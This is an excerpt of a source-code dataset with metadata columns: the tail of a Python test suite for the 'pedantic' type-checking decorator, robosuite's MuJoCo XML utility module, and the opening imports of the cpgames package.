with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_sequence_bad_element(self):
@pedantic
def foo(a: Sequence[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=[1, 2, 'bb'])
def test_abstractset_custom_type(self):
T = TypeVar('T')
@pedantic_class
class DummySet(AbstractSet[T]):
def __contains__(self, x: object) -> bool:
return x == 1
def __len__(self) -> T:
return 1
def __iter__(self) -> Iterator[T]:
yield 1
@pedantic
def foo(a: AbstractSet[int]) -> None:
pass
foo(a=DummySet[int]())
def test_abstractset_bad_type(self):
@pedantic
def foo(a: AbstractSet[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_set_bad_type(self):
@pedantic
def foo(a: Set[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_abstractset_bad_element(self):
@pedantic
def foo(a: AbstractSet[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a={1, 2, 'bb'})
def test_set_bad_element(self):
@pedantic
def foo(a: Set[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a={1, 2, 'bb'})
def test_tuple_bad_type(self):
@pedantic
def foo(a: Tuple[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_tuple_too_many_elements(self):
@pedantic
def foo(a: Tuple[int, str]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=(1, 'aa', 2))
def test_tuple_too_few_elements(self):
@pedantic
def foo(a: Tuple[int, str]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=(1,))
def test_tuple_bad_element(self):
@pedantic
def foo(a: Tuple[int, str]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=(1, 2))
def test_tuple_ellipsis_bad_element(self):
@pedantic
def foo(a: Tuple[int, ...]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=(1, 2, 'blah'))
def test_namedtuple(self):
Employee = NamedTuple('Employee', [('name', str), ('id', int)])
@pedantic
def foo(bar: Employee) -> None:
print(bar)
foo(bar=Employee('bob', 1))
def test_namedtuple_key_mismatch(self):
Employee1 = NamedTuple('Employee', [('name', str), ('id', int)])
Employee2 = NamedTuple('Employee', [('firstname', str), ('id', int)])
@pedantic
def foo(bar: Employee1) -> None:
print(bar)
with self.assertRaises(PedanticTypeCheckException):
foo(bar=Employee2('bob', 1))
def test_namedtuple_type_mismatch(self):
Employee = NamedTuple('Employee', [('name', str), ('id', int)])
@pedantic
def foo(bar: Employee) -> None:
print(bar)
with self.assertRaises(PedanticTypeCheckException):
foo(bar=('bob', 1))
def test_namedtuple_huge_type_mismatch(self):
Employee = NamedTuple('Employee', [('name', str), ('id', int)])
@pedantic
def foo(bar: int) -> None:
print(bar)
with self.assertRaises(PedanticTypeCheckException):
foo(bar=foo(bar=Employee('bob', 1)))
def test_namedtuple_wrong_field_type(self):
Employee = NamedTuple('Employee', [('name', str), ('id', int)])
@pedantic
def foo(bar: Employee) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(bar=Employee(2, 1))
def test_union(self):
@pedantic
def foo(a: Union[str, int]) -> None:
pass
for value in [6, 'xa']:
foo(a=value)
def test_union_new_syntax(self):
if sys.version_info < (3, 10):
return
@pedantic
def foo(a: str | int) -> None:
pass
for value in [6, 'xa']:
foo(a=value)
with self.assertRaises(PedanticTypeCheckException):
foo(a=1.7)
def test_union_typing_type(self):
@pedantic
def foo(a: Union[str, Collection]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=1)
def test_union_fail(self):
@pedantic
def foo(a: Union[str, int]) -> None:
pass
for value in [5.6, b'xa']:
with self.assertRaises(PedanticTypeCheckException):
foo(a=value)
def test_type_var_constraints(self):
T = TypeVar('T', int, str)
@pedantic
def foo(a: T, b: T) -> None:
pass
for values in [
{'a': 6, 'b': 7},
{'a': 'aa', 'b': "bb"},
]:
foo(**values)
def test_type_var_constraints_fail_typing_type(self):
T = TypeVar('T', int, Collection)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a='aa', b='bb')
def test_typevar_constraints_fail(self):
T = TypeVar('T', int, str)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=2.5, b='aa')
def test_typevar_bound(self):
T = TypeVar('T', bound=Parent)
@pedantic
def foo(a: T, b: T) -> None:
pass
foo(a=Child(), b=Child())
def test_type_var_bound_fail(self):
T = TypeVar('T', bound=Child)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=Parent(), b=Parent())
def test_type_var_invariant_fail(self):
T = TypeVar('T', int, str)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=2, b=3.6)
def test_type_var_covariant(self):
T = TypeVar('T', covariant=True)
@pedantic
def foo(a: T, b: T) -> None:
pass
foo(a=Parent(), b=Child())
def test_type_var_covariant_fail(self):
T = TypeVar('T', covariant=True)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeVarMismatchException):
foo(a=Child(), b=Parent())
def test_type_var_contravariant(self):
T = TypeVar('T', contravariant=True)
@pedantic
def foo(a: T, b: T) -> None:
pass
foo(a=Child(), b=Parent())
def test_type_var_contravariant_fail(self):
T = TypeVar('T', contravariant=True)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeVarMismatchException):
foo(a=Parent(), b=Child())
def test_class_bad_subclass(self):
@pedantic
def foo(a: Type[Child]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=Parent)
def test_class_any(self):
@pedantic
def foo(a: Type[Any]) -> None:
pass
foo(a=str)
def test_wrapped_function(self):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
return wrapper
@pedantic
@decorator
def foo(a: 'Child') -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=Parent())
def test_mismatching_default_type(self):
@pedantic
def foo(a: str = 1) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo()
def test_implicit_default_none(self):
"""
Test that if the default value is ``None``, a ``None`` argument can be passed.
"""
@pedantic
def foo(a: Optional[str] = None) -> None:
pass
foo()
def test_generator_simple(self):
"""Test that argument type checking works in a generator function too."""
@pedantic
def generate(a: int) -> Generator[int, int, None]:
yield a
yield a + 1
gen = generate(a=1)
next(gen)
def test_wrapped_generator_no_return_type_annotation(self):
"""Test that return type checking works in a generator function too."""
@pedantic
def generate(a: int) -> Generator[int, int, None]:
yield a
yield a + 1
gen = generate(a=1)
next(gen)
def test_varargs(self):
@pedantic
def foo(*args: int) -> None:
pass
foo(1, 2)
def test_varargs_fail(self):
@pedantic
def foo(*args: int) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(1, 'a')
def test_kwargs(self):
@pedantic
def foo(**kwargs: int) -> None:
pass
foo(a=1, b=2)
def test_kwargs_fail(self):
@pedantic
def foo(**kwargs: int) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=1, b='a')
def test_generic(self):
T_Foo = TypeVar('T_Foo')
class FooGeneric(Generic[T_Foo]):
pass
@pedantic
def foo(a: FooGeneric[str]) -> None:
print(a)
foo(a=FooGeneric[str]())
def test_newtype(self):
myint = NewType("myint", int)
@pedantic
def foo(a: myint) -> int:
return 42
assert foo(a=1) == 42
with self.assertRaises(PedanticTypeCheckException):
foo(a="a")
def test_collection(self):
@pedantic
def foo(a: Collection) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=True)
def test_binary_io(self):
@pedantic
def foo(a: BinaryIO) -> None:
print(a)
foo(a=BytesIO())
def test_text_io(self):
@pedantic
def foo(a: TextIO) -> None:
print(a)
foo(a=StringIO())
def test_binary_io_fail(self):
@pedantic
def foo(a: TextIO) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo(a=BytesIO())
def test_text_io_fail(self):
@pedantic
def foo(a: BinaryIO) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo(a=StringIO())
def test_binary_io_real_file(self):
@pedantic
def foo(a: BinaryIO) -> None:
print(a)
with open(file=TEST_FILE, mode='wb') as f:
foo(a=f)
def test_text_io_real_file(self):
@pedantic
def foo(a: TextIO) -> None:
print(a)
with open(file=TEST_FILE, mode='w') as f:
foo(a=f)
def test_pedantic_return_type_var_fail(self):
T = TypeVar('T', int, float)
@pedantic
def foo(a: T, b: T) -> T:
return 'a'
with self.assertRaises(PedanticTypeCheckException):
foo(a=4, b=2)
def test_callable(self):
@pedantic
def foo_1(a: Callable[..., int]) -> None:
print(a)
@pedantic
def foo_2(a: Callable) -> None:
print(a)
def some_callable() -> int:
return 4
foo_1(a=some_callable)
with self.assertRaises(PedanticTypeCheckException):
foo_2(a=some_callable)
def test_list(self):
@pedantic
def foo_1(a: List[int]) -> None:
print(a)
@pedantic
def foo_2(a: List) -> None:
print(a)
@pedantic
def foo_3(a: list) -> None:
print(a)
foo_1(a=[1, 2])
with self.assertRaises(PedanticTypeCheckException):
foo_2(a=[1, 2])
with self.assertRaises(PedanticTypeCheckException):
foo_3(a=[1, 2])
def test_dict(self):
@pedantic
def foo_1(a: Dict[str, int]) -> None:
print(a)
@pedantic
def foo_2(a: Dict) -> None:
print(a)
@pedantic
def foo_3(a: dict) -> None:
print(a)
foo_1(a={'x': 2})
with self.assertRaises(PedanticTypeCheckException):
foo_3(a={'x': 2})
with self.assertRaises(PedanticTypeCheckException):
foo_3(a={'x': 2})
def test_sequence(self):
@pedantic
def foo(a: Sequence[str]) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
foo(a=value)
def test_sequence_no_type_args(self):
@pedantic
def foo(a: Sequence) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
with self.assertRaises(PedanticTypeCheckException):
foo(a=value)
def test_iterable(self):
@pedantic
def foo(a: Iterable[str]) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
foo(a=value)
def test_iterable_no_type_args(self):
@pedantic
def foo(a: Iterable) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
with self.assertRaises(PedanticTypeCheckException):
foo(a=value)
def test_container(self):
@pedantic
def foo(a: Container[str]) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
foo(a=value)
def test_container_no_type_args(self):
@pedantic
def foo(a: Container) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
with self.assertRaises(PedanticTypeCheckException):
foo(a=value)
def test_set(self):
@pedantic
def foo_1(a: AbstractSet[int]) -> None:
print(a)
@pedantic
def foo_2(a: Set[int]) -> None:
print(a)
for value in [set(), {6}]:
foo_1(a=value)
foo_2(a=value)
def test_set_no_type_args(self):
@pedantic
def foo_1(a: AbstractSet) -> None:
print(a)
@pedantic
def foo_2(a: Set) -> None:
print(a)
@pedantic
def foo_3(a: set) -> None:
print(a)
for value in [set(), {6}]:
with self.assertRaises(PedanticTypeCheckException):
foo_1(a=value)
with self.assertRaises(PedanticTypeCheckException):
foo_2(a=value)
with self.assertRaises(PedanticTypeCheckException):
foo_3(a=value)
def test_tuple(self):
@pedantic
def foo_1(a: Tuple[int, int]) -> None:
print(a)
@pedantic
def foo_2(a: Tuple[int, ...]) -> None:
print(a)
foo_1(a=(1, 2))
foo_2(a=(1, 2))
def test_tuple_no_type_args(self):
@pedantic
def foo_1(a: Tuple) -> None:
print(a)
@pedantic
def foo_2(a: tuple) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo_1(a=(1, 2))
with self.assertRaises(PedanticTypeCheckException):
foo_2(a=(1, 2))
def test_empty_tuple(self):
@pedantic
def foo(a: Tuple[()]) -> None:
print(a)
foo(a=())
def test_class(self):
@pedantic
def foo_1(a: Type[Parent]) -> None:
print(a)
@pedantic
def foo_2(a: Type[TypeVar('UnboundType')]) -> None:
print(a)
@pedantic
def foo_3(a: Type[TypeVar('BoundType', bound=Parent)]) -> None:
print(a)
foo_1(a=Child)
foo_2(a=Child)
foo_3(a=Child)
def test_class_no_type_vars(self):
@pedantic
def foo_1(a: Type) -> None:
print(a)
@pedantic
def foo_2(a: type) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo_1(a=Child)
with self.assertRaises(PedanticTypeCheckException):
foo_2(a=Child)
def test_class_not_a_class(self):
@pedantic
def foo(a: Type[Parent]) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo(a=1)
def test_complex(self):
@pedantic
def foo(a: complex) -> None:
print(a)
foo(a=complex(1, 5))
with self.assertRaises(PedanticTypeCheckException):
foo(a=1.0)
def test_float(self):
@pedantic
def foo(a: float) -> None:
print(a)
foo(a=1.5)
with self.assertRaises(PedanticTypeCheckException):
foo(a=1)
def test_coroutine_correct_return_type(self):
@pedantic
async def foo() -> str:
return 'foo'
coro = foo()
with self.assertRaises(StopIteration):
coro.send(None)
def test_coroutine_wrong_return_type(self):
@pedantic
async def foo() -> str:
return 1
coro = foo()
with self.assertRaises(PedanticTypeCheckException):
coro.send(None)
def test_bytearray_bytes(self):
@pedantic
def foo(x: bytearray) -> None:
pass
foo(x=bytearray([1]))
def test_class_decorator(self):
@pedantic_class
class Foo:
@staticmethod
def staticmethod() -> int:
return 'foo'
@classmethod
def classmethod(cls) -> int:
return 'foo'
def method(self) -> int:
return 'foo'
with self.assertRaises(PedanticTypeCheckException):
Foo.staticmethod()
with self.assertRaises(PedanticTypeCheckException):
Foo.classmethod()
with self.assertRaises(PedanticTypeCheckException):
Foo().method()
def test_generator(self):
@pedantic
def genfunc() -> Generator[int, str, List[str]]:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
gen = genfunc()
with self.assertRaises(StopIteration):
value = next(gen)
while True:
value = gen.send(str(value))
assert isinstance(value, int)
def test_generator_no_type_args(self):
@pedantic
def genfunc() -> Generator:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
with self.assertRaises(PedanticTypeCheckException):
genfunc()
def test_iterator(self):
@pedantic
def genfunc() -> Iterator[int]:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
gen = genfunc()
with self.assertRaises(PedanticTypeCheckException):
value = next(gen)
while True:
value = gen.send(str(value))
assert isinstance(value, int)
def test_iterator_no_type_args(self):
@pedantic
def genfunc() -> Iterator:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
with self.assertRaises(PedanticTypeCheckException):
genfunc()
def test_iterable_advanced(self):
@pedantic
def genfunc() -> Iterable[int]:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
gen = genfunc()
with self.assertRaises(PedanticTypeCheckException):
value = next(gen)
while True:
value = gen.send(str(value))
assert isinstance(value, int)
def test_iterable_advanced_no_type_args(self):
@pedantic
def genfunc() -> Iterable:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
with self.assertRaises(PedanticTypeCheckException):
genfunc()
def test_generator_bad_yield(self):
@pedantic
def genfunc_1() -> Generator[int, str, None]:
yield 'foo'
@pedantic
def genfunc_2() -> Iterable[int]:
yield 'foo'
@pedantic
def genfunc_3() -> Iterator[int]:
yield 'foo'
gen = genfunc_1()
with self.assertRaises(PedanticTypeCheckException):
next(gen)
gen = genfunc_2()
with self.assertRaises(PedanticTypeCheckException):
next(gen)
gen = genfunc_3()
with self.assertRaises(PedanticTypeCheckException):
next(gen)
def test_generator_bad_send(self):
@pedantic
def genfunc() -> Generator[int, str, None]:
yield 1
yield 2
gen = genfunc()
next(gen)
with self.assertRaises(PedanticTypeCheckException):
gen.send(2)
def test_generator_bad_return(self):
@pedantic
def genfunc() -> Generator[int, str, str]:
yield 1
return 6
gen = genfunc()
next(gen)
with self.assertRaises(PedanticTypeCheckException):
gen.send('foo')
def test_return_generator(self):
@pedantic
def genfunc() -> Generator[int, None, None]:
yield 1
@pedantic
def foo() -> Generator[int, None, None]:
return genfunc()
foo()
def test_local_class(self):
@pedantic_class
class LocalClass:
class Inner:
pass
def create_inner(self) -> 'Inner':
return self.Inner()
retval = LocalClass().create_inner()
assert isinstance(retval, LocalClass.Inner)
def test_local_class_async(self):
@pedantic_class
class LocalClass:
class Inner:
pass
async def create_inner(self) -> 'Inner':
return self.Inner()
coro = LocalClass().create_inner()
with self.assertRaises(StopIteration):
coro.send(None)
def test_callable_nonmember(self):
class CallableClass:
def __call__(self):
pass
@pedantic_class
class LocalClass:
some_callable = CallableClass()
def test_inherited_class_method(self):
@pedantic_class
class Parent:
@classmethod
def foo(cls, x: str) -> str:
return cls.__name__
@pedantic_class
class Child(Parent):
pass
self.assertEqual('Parent', Child.foo(x='bar'))
with self.assertRaises(PedanticTypeCheckException):
Child.foo(x=1)
def test_type_var_forward_ref_bound(self):
TBound = TypeVar('TBound', bound='Parent')
@pedantic
def func(x: TBound) -> None:
pass
func(x=Parent())
with self.assertRaises(PedanticTypeCheckException):
func(x='foo')
def test_noreturn(self):
@pedantic
def foo() -> NoReturn:
pass
with self.assertRaises(PedanticTypeCheckException):
foo()
def test_literal(self):
if sys.version_info < (3, 8):
return
from typing import Literal
@pedantic
def foo(a: Literal[1, True, 'x', b'y', 404]) -> None:
print(a)
foo(a=404)
foo(a=True)
foo(a='x')
with self.assertRaises(PedanticTypeCheckException):
foo(a=4)
def test_literal_union(self):
if sys.version_info < (3, 8):
return
from typing import Literal
@pedantic
def foo(a: Union[str, Literal[1, 6, 8]]) -> None:
print(a)
foo(a=6)
with self.assertRaises(PedanticTypeCheckException):
foo(a=4)
def test_literal_illegal_value(self):
if sys.version_info < (3, 8):
return
from typing import Literal
@pedantic
def foo(a: Literal[1, 1.1]) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo(a=4)
def test_enum(self):
with self.assertRaises(PedanticTypeCheckException):
@pedantic_class
class MyEnum(Enum):
A = 'a'
def test_enum_aggregate(self):
T = TypeVar('T', bound=IntEnum)
@pedantic_class
class EnumAggregate(Generic[T]):
enum: ClassVar[Type[T]]
def __init__(self, value: Union[int, str, List[T]]) -> None:
assert len(self.enum) < 10
if value == '':
raise ValueError(f'Parameter "value" cannot be empty!')
if isinstance(value, list):
self._value = ''.join([str(x.value) for x in value])
else:
self._value = str(value)
self._value = ''.join(sorted(self._value)) # sort characters in string
self.to_list() # check if is valid
def __contains__(self, item: T) -> bool:
return item in self.to_list()
def __eq__(self, other: Union['EnumAggregate', str]) -> bool:
if isinstance(other, str):
return self._value == other
return self._value == other._value
def __str__(self) -> str:
return self._value
def to_list(self) -> List[T]:
return [self.enum(int(character)) for character in self._value]
@property
def value(self) -> str:
return self._value
@classmethod
def all(cls) -> str:
return ''.join([str(x.value) for x in cls.enum])
class Gender(IntEnum):
MALE = 1
FEMALE = 2
DIVERS = 3
@pedantic_class
class Genders(EnumAggregate[Gender]):
enum = Gender
Genders(value=12)
with self.assertRaises(PedanticTypeCheckException):
Genders(value=Child())
| 26.833543
| 117
| 0.544439
| 63,268
| 0.988593
| 4,664
| 0.072877
| 25,277
| 0.394965
| 168
| 0.002625
| 2,810
| 0.043908
|
369fa166feeca798a146fe563bb6633de1435b63
| 12,391
|
py
|
Python
|
robosuite/utils/mjcf_utils.py
|
kyungjaelee/robosuite
|
0d73fcca9ed8e638632f4bd7b0f1b8ebf4640fb1
|
[
"MIT"
] | null | null | null |
robosuite/utils/mjcf_utils.py
|
kyungjaelee/robosuite
|
0d73fcca9ed8e638632f4bd7b0f1b8ebf4640fb1
|
[
"MIT"
] | null | null | null |
robosuite/utils/mjcf_utils.py
|
kyungjaelee/robosuite
|
0d73fcca9ed8e638632f4bd7b0f1b8ebf4640fb1
|
[
"MIT"
] | 1
|
2021-03-26T19:10:00.000Z
|
2021-03-26T19:10:00.000Z
|
# utility functions for manipulating MJCF XML models
import xml.etree.ElementTree as ET
import os
import numpy as np
from collections.abc import Iterable
from PIL import Image
from pathlib import Path
import robosuite
RED = [1, 0, 0, 1]
GREEN = [0, 1, 0, 1]
BLUE = [0, 0, 1, 1]
TEXTURES = {
"WoodRed": "red-wood.png",
"WoodGreen": "green-wood.png",
"WoodBlue": "blue-wood.png",
"WoodLight": "light-wood.png",
"WoodDark": "dark-wood.png",
"WoodTiles": "wood-tiles.png",
"WoodPanels": "wood-varnished-panels.png",
"WoodgrainGray": "gray-woodgrain.png",
"PlasterCream": "cream-plaster.png",
"PlasterPink": "pink-plaster.png",
"PlasterYellow": "yellow-plaster.png",
"PlasterGray": "gray-plaster.png",
"PlasterWhite": "white-plaster.png",
"BricksWhite": "white-bricks.png",
"Metal": "metal.png",
"SteelBrushed": "steel-brushed.png",
"SteelScratched": "steel-scratched.png",
"Brass": "brass-ambra.png",
"Bread": "bread.png",
"Can": "can.png",
"Ceramic": "ceramic.png",
"Cereal": "cereal.png",
"Clay": "clay.png",
"Dirt": "dirt.png",
"Glass": "glass.png",
"FeltGray": "gray-felt.png",
"Lemon": "lemon.png",
}
ALL_TEXTURES = TEXTURES.keys()
def xml_path_completion(xml_path):
"""
Takes in a local xml path and returns a full path.
if @xml_path is absolute, do nothing
if @xml_path is not absolute, load xml that is shipped by the package
Args:
xml_path (str): local xml path
Returns:
str: Full (absolute) xml path
"""
if xml_path.startswith("/"):
full_path = xml_path
else:
full_path = os.path.join(robosuite.models.assets_root, xml_path)
return full_path
def array_to_string(array):
"""
Converts a numeric array into the string format in mujoco.
Examples:
[0, 1, 2] => "0 1 2"
"""
return " ".join(["{}".format(x) for x in array])
def string_to_array(string):
"""
Converts a array string in mujoco xml to np.array.
Examples:
"0 1 2" => [0, 1, 2]
Args:
string (str): String to convert to an array
Returns:
np.array: Numerical array equivalent of @string
"""
return np.array([float(x) for x in string.split(" ")])
def set_alpha(node, alpha=0.1):
"""
Sets all a(lpha) field of the rgba attribute to be @alpha
for @node and all subnodes
used for managing display
Args:
node (ET.Element): Specific node element within XML tree
alpha (float): Value to set alpha value of rgba tuple
"""
for child_node in node.findall(".//*[@rgba]"):
rgba_orig = string_to_array(child_node.get("rgba"))
child_node.set("rgba", array_to_string(list(rgba_orig[0:3]) + [alpha]))
def new_joint(**kwargs):
"""
Creates a joint tag with attributes specified by @**kwargs.
Args:
**kwargs (dict): Specified attributes for the new joint
Returns:
ET.Element: new joint xml element
"""
element = ET.Element("joint", attrib=kwargs)
return element
def new_actuator(joint, act_type="actuator", **kwargs):
"""
Creates an actuator tag with attributes specified by @**kwargs.
Args:
joint (str): type of actuator transmission.
see all types here: http://mujoco.org/book/modeling.html#actuator
act_type (str): actuator type. Defaults to "actuator"
**kwargs (dict): Any additional specified attributes for the new joint
Returns:
ET.Element: new actuator xml element
"""
element = ET.Element(act_type, attrib=kwargs)
element.set("joint", joint)
return element
def new_site(name, rgba=RED, pos=(0, 0, 0), size=(0.005,), **kwargs):
"""
Creates a site element with attributes specified by @**kwargs.
NOTE: With the exception of @name, @pos, and @size, if any arg is set to
None, the value will automatically be popped before passing the values
to create the appropriate XML
Args:
name (str): site name.
rgba (4-array): (r,g,b,a) color and transparency. Defaults to solid red.
pos (3-array): (x,y,z) 3d position of the site.
size (array of float): site size (sites are spherical by default).
**kwargs (dict): Any additional specified attributes for the new site
Returns:
ET.Element: new site xml element
"""
kwargs["name"] = name
kwargs["pos"] = array_to_string(pos)
kwargs["size"] = array_to_string(size)
kwargs["rgba"] = array_to_string(rgba) if rgba is not None else None
# Loop through all remaining attributes and pop any that are None
for k, v in kwargs.copy().items():
if v is None:
kwargs.pop(k)
element = ET.Element("site", attrib=kwargs)
return element
def new_geom(geom_type, size, pos=(0, 0, 0), rgba=RED, group=0, **kwargs):
"""
Creates a geom element with attributes specified by @**kwargs.
NOTE: With the exception of @geom_type, @size, and @pos, if any arg is set to
None, the value will automatically be popped before passing the values
to create the appropriate XML
Args:
geom_type (str): type of the geom.
see all types here: http://mujoco.org/book/modeling.html#geom
size (array of float): geom size parameters.
pos (3-array): (x,y,z) 3d position of the site.
rgba (4-array): (r,g,b,a) color and transparency. Defaults to solid red.
group (int): the integrer group that the geom belongs to. useful for
separating visual and physical elements.
**kwargs (dict): Any additional specified attributes for the new geom
Returns:
ET.Element: new geom xml element
"""
kwargs["type"] = str(geom_type)
kwargs["size"] = array_to_string(size)
kwargs["pos"] = array_to_string(pos)
kwargs["rgba"] = array_to_string(rgba) if rgba is not None else None
kwargs["group"] = str(group) if group is not None else None
# Loop through all remaining attributes and pop any that are None
for k, v in kwargs.copy().items():
if v is None:
kwargs.pop(k)
element = ET.Element("geom", attrib=kwargs)
return element
def new_body(name=None, pos=None, **kwargs):
"""
Creates a body element with attributes specified by @**kwargs.
Args:
name (str): body name.
pos (3-array): (x,y,z) 3d position of the body frame.
**kwargs (dict): Any additional specified attributes for the new body
Returns:
ET.Element: new body xml element
"""
if name is not None:
kwargs["name"] = name
if pos is not None:
kwargs["pos"] = array_to_string(pos)
element = ET.Element("body", attrib=kwargs)
return element
def new_inertial(name=None, pos=(0, 0, 0), mass=None, **kwargs):
"""
Creates a inertial element with attributes specified by @**kwargs.
Args:
name (str): [NOT USED]
pos (3-array): (x,y,z) 3d position of the inertial frame.
mass (float): The mass of inertial
**kwargs (dict): Any additional specified attributes for the new inertial element
Returns:
ET.Element: new inertial xml element
"""
if mass is not None:
kwargs["mass"] = str(mass)
kwargs["pos"] = array_to_string(pos)
element = ET.Element("inertial", attrib=kwargs)
return element
def postprocess_model_xml(xml_str):
"""
This function postprocesses the model.xml collected from a MuJoCo demonstration
in order to make sure that the STL files can be found.
Args:
xml_str (str): Mujoco sim demonstration XML file as string
Returns:
str: Post-processed xml file as string
"""
path = os.path.split(robosuite.__file__)[0]
path_split = path.split("/")
# replace mesh and texture file paths
tree = ET.fromstring(xml_str)
root = tree
asset = root.find("asset")
meshes = asset.findall("mesh")
textures = asset.findall("texture")
all_elements = meshes + textures
for elem in all_elements:
old_path = elem.get("file")
if old_path is None:
continue
old_path_split = old_path.split("/")
ind = max(
loc for loc, val in enumerate(old_path_split) if val == "robosuite"
) # last occurrence index
new_path_split = path_split + old_path_split[ind + 1 :]
new_path = "/".join(new_path_split)
elem.set("file", new_path)
return ET.tostring(root, encoding="utf8").decode("utf8")
class CustomMaterial(object):
"""
Simple class to instantiate the necessary parameters to define an appropriate texture / material combo
Instantiates a nested dict holding necessary components for procedurally generating a texture / material combo
Please see http://www.mujoco.org/book/XMLreference.html#asset for specific details on
attributes expected for Mujoco texture / material tags, respectively
Note that the values in @tex_attrib and @mat_attrib can be in string or array / numerical form.
Args:
texture (str or 4-array): Name of texture file to be imported. If a string, should be part of ALL_TEXTURES
If texture is a 4-array, then this argument will be interpreted as an rgba tuple value and a template
png will be procedurally generated during object instantiation, with any additional
texture / material attributes specified.
Note the RGBA values are expected to be floats between 0 and 1
tex_name (str): Name to reference the imported texture
mat_name (str): Name to reference the imported material
tex_attrib (dict): Any other optional mujoco texture specifications.
mat_attrib (dict): Any other optional mujoco material specifications.
Raises:
AssertionError: [Invalid texture]
"""
def __init__(
self,
texture,
tex_name,
mat_name,
tex_attrib=None,
mat_attrib=None,
):
# Check if the desired texture is an rgba value
if type(texture) is str:
default = False
# Verify that requested texture is valid
assert texture in ALL_TEXTURES, "Error: Requested invalid texture. Got {}. Valid options are:\n{}".format(
texture, ALL_TEXTURES)
else:
default = True
# This is an rgba value and a default texture is desired; make sure length of rgba array is 4
assert len(texture) == 4, "Error: Requested default texture. Got array of length {}. Expected rgba array " \
"of length 4.".format(len(texture))
# Setup the texture and material attributes
self.tex_attrib = {} if tex_attrib is None else tex_attrib.copy()
self.mat_attrib = {} if mat_attrib is None else mat_attrib.copy()
# Add in name values
self.tex_attrib["name"] = tex_name
self.mat_attrib["name"] = mat_name
self.mat_attrib["texture"] = tex_name
# Loop through all attributes and convert all non-string values into strings
for attrib in (self.tex_attrib, self.mat_attrib):
for k, v in attrib.items():
if type(v) is not str:
if isinstance(v, Iterable):
attrib[k] = array_to_string(v)
else:
attrib[k] = str(v)
# Handle default and non-default cases separately for linking texture patch file locations
if not default:
# Add in the filepath to texture patch
self.tex_attrib["file"] = xml_path_completion("textures/" + TEXTURES[texture])
else:
# Create a texture patch
tex = Image.new('RGBA', (100, 100), tuple((np.array(texture)*255).astype('int')))
# Create temp directory if it does not exist
save_dir = "/tmp/robosuite_temp_tex"
Path(save_dir).mkdir(parents=True, exist_ok=True)
# Save this texture patch to the temp directory on disk (MacOS / Linux)
fpath = save_dir + "/{}.png".format(tex_name)
tex.save(fpath, "PNG")
# Link this texture file to the default texture dict
self.tex_attrib["file"] = fpath
| 33.855191
| 120
| 0.62957
| 3,802
| 0.306836
| 0
| 0
| 0
| 0
| 0
| 0
| 7,433
| 0.599871
|
36a07f1b483e17aa9a2719b08beb5635ce843a05
| 1,106
|
py
|
Python
|
cpgames/modules/core/__init__.py
|
Wasabii88/Games
|
33262ca1958207a24e57e3532feded7e275b1dd1
|
[
"MIT"
] | 1
|
2022-03-07T11:13:08.000Z
|
2022-03-07T11:13:08.000Z
|
cpgames/modules/core/__init__.py
|
Wasabii88/Games
|
33262ca1958207a24e57e3532feded7e275b1dd1
|
[
"MIT"
] | null | null | null |
cpgames/modules/core/__init__.py
|
Wasabii88/Games
|
33262ca1958207a24e57e3532feded7e275b1dd1
|
[
"MIT"
] | null | null | null |
'''initialize'''
from .ski import SkiGame
from .maze import MazeGame
from .gobang import GobangGame
from .tetris import TetrisGame
from .pacman import PacmanGame
from .gemgem import GemGemGame
from .tankwar import TankWarGame
from .sokoban import SokobanGame
from .pingpong import PingpongGame
from .trexrush import TRexRushGame
